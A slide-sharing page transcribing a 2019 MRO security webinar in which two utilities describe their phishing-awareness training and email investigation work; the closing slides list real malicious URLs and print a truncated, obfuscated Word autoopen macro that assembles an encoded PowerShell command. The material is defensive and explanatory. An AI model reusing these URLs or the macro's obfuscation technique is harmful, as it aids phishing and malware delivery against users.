mro security advisory council sac webinar
play

MRO Security Advisory Council (SAC) Webinar A Tale of Two Phishing - PowerPoint PPT Presentation

Sep 01, 2022 •40 likes •470 views

MRO Security Advisory Council (SAC) Webinar A Tale of Two Phishing Programs Seth Bross, Enterprise Security Analyst, OGE Energy Corporation Tammy Retzlaff, Consultant Information Security Analyst, American Transmission Company Jamie

  1. MRO Security Advisory Council (SAC) Webinar “A Tale of Two Phishing Programs” Seth Bross, Enterprise Security Analyst, OGE Energy Corporation Tammy Retzlaff, Consultant Information Security Analyst, American Transmission Company Jamie Arndt, Senior Cyber Security Engineer, American Transmission Company July 11, 2019

  2. A Tale of Two Phishing Programs MRO Presentation July 11, 2019

  3. ATC – Phishing Program Tammy Retzlaff, CISSP, CISM, CRISC Information Security Analyst atcllc.com

  4. Who We Are • ATC was founded in 2001 as a transmission-only utility serving the Upper Peninsula of Michigan, the eastern half of Wisconsin, and a small portion of Illinois. • We manage almost10,000 miles of high-voltage transmission lines and 568 substations. • We have approximately 600 employees and 1800+/- contractors. atcllc.com 3

  5. Where We’ve Been In 2012 malicious email attacks were increasing almost daily… – Employees unaware of the risk – Leaders unaware of the risk – No easy way to report suspected phishing emails – Email investigations difficult and time consuming • We knew we needed to do something … atcllc.com 4

  6. How We Started • Looked for ways to train our employees on the dangers of phishing • Decided on the good behaviors we wanted to re-enforce • Researched tools where out there to help us • Gained buy-in from leaders atcllc.com 5

  7. The Journey • 2012 – purchased a tool to help us “phish” our employees • 2013 – began running Monthly Scenarios – Immediate Education – Easy ways to report – Focus on Good behaviors – report, report, report • 2016 – Assessed the program from a Human Performance standpoint • 2017 - Corporate Goal – tied to bonus • 2018 – Made improvements to the program – In person conversations for repeat clickers – Retest for individuals who fell for the phish atcllc.com 6

  8. Where We Are Today • Read and discuss opportunity for all employees • Quarterly prize drawings for reporters • Depts challenge each other • “Leader Board” • Catalyst to talk about security across the organization atcllc.com 7

  9. Trends Reporting of phishing scenarios is trending upward Clicking on phishing scenarios is trending downward atcllc.com 8

  10. Where We’re Going • Increasing difficulty of scenarios • Targeted scenarios in addition to monthly • Tighter tie-in with Human Performance atcllc.com 9

  11. Lessons Learned • Leadership support of the program is key in its success • Focusing on positive behaviors gets better buy-in than focusing on negative behaviors • Partner with as many people in the organization as possible • Deliver your message in person as often as possible • Reinforce your message as often as possible atcllc.com 10

  12. Internal Phishing Program Seth Bross, CISSP Systems Security Analyst 11

  13. Company Overview • Founded in 1902 • Around 3000 active members • Our company works the entire electric stack from generation and transmission to distribution. 12

  14. Phishing Program Overview • Every Member receives a simulated phishing email once a month • Training is provided in cases where a member falls for a simulated phishing email. • Training is provided through our phishing/training vendor automatically • Simulated phishing emails are from the vendor based on real phishing emails • All suspect emails reported are run through an automated verification system and responded to. 13

  15. Benefits • Increased awareness of the types of emails that are phishy • More contact between the business and Security • Training can be provided immediately and can be tailored to issues • Reduce phishing attack surface • Increased contact with security 14

  16. Automated Response to Submitted emails • By utilizing SOAR we have been able to reduce the man hours needed to respond to emails drastically. • Increased reporting capabilities • More insight into the effectiveness of our tools • The SOAR platform allows for some automated analysis that would normally require manual examination. 15

  17. Forward Outlook • SOAR (Security Orchestration, Automation and Response) improvements • Increased the ability to integrate tools and use external input to increase automated response. • Reduce time needed to analyze and respond to emails • Further integrations with SOAR tools, email servers and End Point Protection Tools 16

  18. Lessons Learned • Some people will feel “Tricked” when they fail a test and it can result in non-productive interactions. • Messaging must go out early and frequently to allow time for employees to understand the purpose of the tests and how they are used. • Make sure that the security tests are not used as a stick but as a training opportunity • Automate early, automate often 17

  19. Simulated Phishing Email Example 18

  20. Detection Evasion 19

  21. Detection Evasion 20

  22. Detection Evasion 21

  23. ATC – Manual Investigation Jamie Arndt Senior Cybersecurity Engineer atcllc.com

  24. Spam

  25. Malicious URLs http://www.puynag-china.com/server/?email=[email here]

  26. Malicious Documents https://luxur.club/wp-content/25ke-t65cr-eczyfts

  27. Obfuscate ted m macros Sub autoopen() On Error Resume Next <snip> jQ1AA14 = (NoBUxo / Log(i1o1_wDG) - CXA_QU * Oct(177462578) - fC_4AoA - Log(bAAABA - MAw1XQUA / WQkAZ1 - 258583782)) End If l_DDCAU (jAUUBx + "po" + FADAUk_ + "wersh" + QAAADDA + "ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA) If YQUw_U = UBoABkAk Then lAxAAAC = 210690210 * Round(342763755) / wDUoQAUB - Tan(557511061 + UADAAAZ) * 370351941 + Hex(304503937 + CSng(oBAkAUA)) <snip> End Sub

  28. Obfuscate ted m macros Sub autoopen() On Error Resume Next <snip> jQ1AA14 = (NoBUxo / Log(i1o1_wDG) - CXA_QU * Oct(177462578) - fC_4AoA - Log(bAAABA - MAw1XQUA / WQkAZ1 - 258583782)) End If l_DDCAU (jAUUBx + " po " + FADAUk_ + " wersh " + QAAADDA + " ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA) If YQUw_U = UBoABkAk Then lAxAAAC = 210690210 * Round(342763755) / wDUoQAUB - Tan(557511061 + UADAAAZ) * 370351941 + Hex(304503937 + CSng(oBAkAUA)) <snip> End Sub

  29. l_DDCAU (jAUUBx + " po " + FADAUk_ + " wersh " + QAAADDA + " ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA) Function dDZBAQoc () <snip> SAAAkQAC = "LgAoACAAKABbAFMAVAByAGkAb . . .” <snip> bwcQAAAA = "tAGoATwBpAE4AJwAnACkAKAAgA . . .” <snip> dDZBAQoc = SAAAkQAC + bwcQAAAA + BAwAAoCA + . . . End Function

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

MRO Security Advisory Council (SAC) Webinar Suspicious Packages and Bomb Threat

MRO Security Advisory Council (SAC) Webinar Suspicious Packages and Bomb Threat

MRO Security Advisory Council (SAC) Webinar Suspicious Packages and Bomb Threat Considerations John Breckenridge, Director Corporate Security Business Continuity, KCP&amp;L and Westar, Evergy Companies May 30, 2019 John Breckenridge is

413 views • 25 slides
MRO Security Advisory Council (SAC) Webinar One Companys Path to Establishing Threat

MRO Security Advisory Council (SAC) Webinar One Companys Path to Establishing Threat

MRO Security Advisory Council (SAC) Webinar One Companys Path to Establishing Threat Intelligence and Hunting Jamie Buening, Manager, Threat Intelligence and Hunting, MISO August 21, 2019 MRO SAC Update Technical Training and Social

478 views • 45 slides
GS1 Healthcare Provider Advisory Council Webinar 9 October 2014 HPAC Case Study Webinars This

GS1 Healthcare Provider Advisory Council Webinar 9 October 2014 HPAC Case Study Webinars This

GS1 Healthcare Provider Advisory Council Webinar 9 October 2014 HPAC Case Study Webinars This is the 8th Webinar Innovative National Traceability in Healthcare using GS1 Standards Andrew Smith, Central Decontamination Unit Manager at

785 views • 31 slides
DoDEA PACIFIC AREA ADVISORY COUNCIL (AAC) SY2019 -20 | 14 November 2019 1 Area Advisory Council

DoDEA PACIFIC AREA ADVISORY COUNCIL (AAC) SY2019 -20 | 14 November 2019 1 Area Advisory Council

DoDEA PACIFIC AREA ADVISORY COUNCIL (AAC) SY2019 -20 | 14 November 2019 1 Area Advisory Council SY19-20 Area Advisory Council SY17-18 Area Advisory Council SY16-17 Administrative Remarks Please mute microphones, unless speaking Raise

562 views • 55 slides
ERISA Advisory Council Approaches for Retirement Security in the United States Presentation by

ERISA Advisory Council Approaches for Retirement Security in the United States Presentation by

ERISA Advisory Council Approaches for Retirement Security in the United States Presentation by Steve Abrecht, Director of Benefits and Capital Stewardship, Service Employees International Union September 17, 2009 Good afternoon. Im here to

167 views • 6 slides
Advisory Council: Current State The original composition of the Advisory Council includes 12

Advisory Council: Current State The original composition of the Advisory Council includes 12

TITLE AND TOTAL COMPENSATION PROJECT Advisory Council: Current State The original composition of the Advisory Council includes 12 members representing a crosssection of the UW System and UWMadison employee population. Included are one

174 views • 5 slides
Consumer Advisory Council Consumer Advisory Council 3:10 - 3:25 Nisonger Center Update

Consumer Advisory Council Consumer Advisory Council 3:10 - 3:25 Nisonger Center Update

2/3/2020 CAC Agenda CAC Agenda 3:00 - 3:10 Welcome and Introductions Jed Morison Welcome everyone around the table Approval of Minutes (4/23/2019) Consumer Advisory Council Consumer Advisory Council 3:10 - 3:25 Nisonger

275 views • 13 slides
Water Infrastructure Advisory Council Role of the Council : Advisory to the Governor, and

Water Infrastructure Advisory Council Role of the Council : Advisory to the Governor, and

DNREC Bond Bill Hearing May 17, 2018 Water Infrastructure Advisory Council Role of the Council : Advisory to the Governor, and Secretaries of DNREC and DHSS Wastewater Collection and Treatment Water Quality Drainage Surface

71 views • 6 slides
UN SECURITY COUNCIL RESOLUTION 1540 (2004): RELEVANCE UN SECURITY COUNCIL RESOLUTION 1540 (2004)

UN SECURITY COUNCIL RESOLUTION 1540 (2004): RELEVANCE UN SECURITY COUNCIL RESOLUTION 1540 (2004)

UPDATE ON UN SECURITY COUNCIL RESOLUTION 1540 (2004) 21 st Asian Export Control Seminar, Tokyo, February 26-28, 2014 Mr. KAI KIESSLER MEMBER GROUP OF EXPERTS ASSISTING THE UNITED NATIONS SECURITY COUNCIL 1540 COMMITTEE UN SECURITY COUNCIL

148 views • 13 slides
Introduction to the Introduction to the Work of the Security Council Work of the Security

Introduction to the Introduction to the Work of the Security Council Work of the Security

Introduction to the Introduction to the Work of the Security Council Work of the Security Council Security Council Practices and Charter Research Branch Security Council Affairs Division Department of Political Affairs United Nations August

490 views • 28 slides
Consumer Advisory Council Consumer Advisory Council 3:15 - 3:30 Nisonger Center Update

Consumer Advisory Council Consumer Advisory Council 3:15 - 3:30 Nisonger Center Update

8/7/2020 CAC Agenda CAC Agenda 3:00 - 3:15 Welcome and Introductions Jed Morison Welcome everyone around the table Approval of Minutes (1/28/2020) Consumer Advisory Council Consumer Advisory Council 3:15 - 3:30 Nisonger

543 views • 28 slides
Introduction to the Introduction to the Work of the Security Council Work of the Security

Introduction to the Introduction to the Work of the Security Council Work of the Security

Introduction to the Introduction to the Work of the Security Council Work of the Security Council Security Council Affairs Division Department of Political Affairs United Nations August 2013 Outline What is the Security Council?

189 views • 16 slides
CTE Advisory Council State Board Update June 11, 2019 2 Show-Me Success 3 4 Organization and

CTE Advisory Council State Board Update June 11, 2019 2 Show-Me Success 3 4 Organization and

David Webb, Council Vice-Chair Raghib Muhammad, Council Member Steve Bryant, DESE Support CTE Advisory Council State Board Update June 11, 2019 2 Show-Me Success 3 4 Organization and Charge to the CTE Advisory Council 5 SB620 and 582

470 views • 25 slides
Overview PCMH Advisory Council Meeting December 18, 2018 1/11/2019 1 PCMH Advisory Council

Overview PCMH Advisory Council Meeting December 18, 2018 1/11/2019 1 PCMH Advisory Council

Office of Medical Assistance Programs Patient-Centered Medical Home (PCMH) Overview PCMH Advisory Council Meeting December 18, 2018 1/11/2019 1 PCMH Advisory Council Agenda 1. Welcome and Introductions 09:00 09:05 2. Progress

439 views • 14 slides
Me Medica cal Ma Marijuana Te Testing Advisor Advisory Council Council October 24, 2019

Me Medica cal Ma Marijuana Te Testing Advisor Advisory Council Council October 24, 2019

Me Medica cal Ma Marijuana Te Testing Advisor Advisory Council Council October 24, 2019 Councils Charge A.R.S. 36 2821(B) The MMJ Testing Advisory Council shall make recommendationsregarding: Establishing a required testing

878 views • 30 slides
#ExportEDGE Brought to you by the Joint Planning Advisory Council Joint Planning Advisory Council

#ExportEDGE Brought to you by the Joint Planning Advisory Council Joint Planning Advisory Council

May 19, 2017 #ExportEDGE Brought to you by the Joint Planning Advisory Council Joint Planning Advisory Council Partners Sun Corridor Export Recognition Program Partners Emerging Global Services ServerLIFT THOSE THAT DO EXPORT ARE MORE

489 views • 29 slides
Police Victim Services BC Greater Victoria Chiefs of Police May 07, 2020 Presentation Agenda

Police Victim Services BC Greater Victoria Chiefs of Police May 07, 2020 Presentation Agenda

Police Victim Services BC Greater Victoria Chiefs of Police May 07, 2020 Presentation Agenda Strategic Considerations Background Overview - Ian Batey, ED Authority and Governance Board of Directors 2019/2020 Mandate,

234 views • 11 slides
Andrii Pastushok PMC-VI, CISM, TOGAF, ITIL Personal vs Product company

Andrii Pastushok PMC-VI, CISM, TOGAF, ITIL Personal vs Product company

Andrii Pastushok PMC-VI, CISM, TOGAF, ITIL Personal vs Product company Initiatives, Internal or External Services Industry 10,5 B 4,5 B 2016 2016 *Forrester revenue forecast for 2011-2016. Pure staff augmentation has been

377 views • 18 slides
EVOLUTION OF THE CISO And the Confluence of IT Security &amp; Audit Thomas Borton, MBA, CISA,

EVOLUTION OF THE CISO And the Confluence of IT Security &amp; Audit Thomas Borton, MBA, CISA,

EVOLUTION OF THE CISO And the Confluence of IT Security &amp; Audit Thomas Borton, MBA, CISA, CISM, CRISC, CISSP Director, IT Security &amp; Compliance 13 March 2014 AGENDA 1. Introduction 2. Evolution of the CISO: Past, Present &amp; Future

200 views • 18 slides
EASM 2014 the establishment of friendly relationships, the achievement of international sporting

EASM 2014 the establishment of friendly relationships, the achievement of international sporting

NATIONS PERFORMANCES IN THE HISTORY OF THE MILITARY WORLD GAMES Submitting author: Prof Luiz Fernando Nbrega Brazilian Army, Physical Education School of the Army BRASILIA, 70272090 Brazil All authors: Luiz Fernando Nbrega (corresp),

288 views • 3 slides
RACISM IN THE STRUCTURE: BRIEF HISTORY OF 20 TH CENTURY BALTIMORE Martin French &amp; Lauren

RACISM IN THE STRUCTURE: BRIEF HISTORY OF 20 TH CENTURY BALTIMORE Martin French &amp; Lauren

RACISM IN THE STRUCTURE: BRIEF HISTORY OF 20 TH CENTURY BALTIMORE Martin French &amp; Lauren Schiszik Baltimore City Department of Planning PLANNING ACADEMY SESSION 1 April 16, 2019 Baltimore City Department of Planning 1 R ACISM IN THE S

525 views • 21 slides
The Equifax Breach and Credit Union Involvement Gene Fredriksen CISM,CRISC 1 10/25/2017

The Equifax Breach and Credit Union Involvement Gene Fredriksen CISM,CRISC 1 10/25/2017

The Equifax Breach and Credit Union Involvement Gene Fredriksen CISM,CRISC 1 10/25/2017 Equifax Information Overload 2 10/25/2017 Equifax Timeline Feb Mar Apr May Jun Jul Aug Sep Time to Patch Vulnerability 138 Days Time to

463 views • 18 slides
Introduction to COBIT Presentation for the ISACA Kansas City Chapter ISACA Kansas City Chapter

Introduction to COBIT Presentation for the ISACA Kansas City Chapter ISACA Kansas City Chapter

Introduction to COBIT Presentation for the ISACA Kansas City Chapter ISACA Kansas City Chapter Presentation 10/12/2008 1 Agenda Introduction IT Challenges Governance Overview The COBIT Framework COBIT Mappings to Various Frameworks Closing

1.32k views • 84 slides
David Sumner EU GDPR P CISM General Data Protection Regulation (GDPR) Why Supports a

David Sumner EU GDPR P CISM General Data Protection Regulation (GDPR) Why Supports a

General Data Protection Regulation David Sumner EU GDPR P CISM General Data Protection Regulation (GDPR) Why Supports a single digital market place Protect privacy &amp; security of EU citizens in the digital age When

231 views • 8 slides

More recommend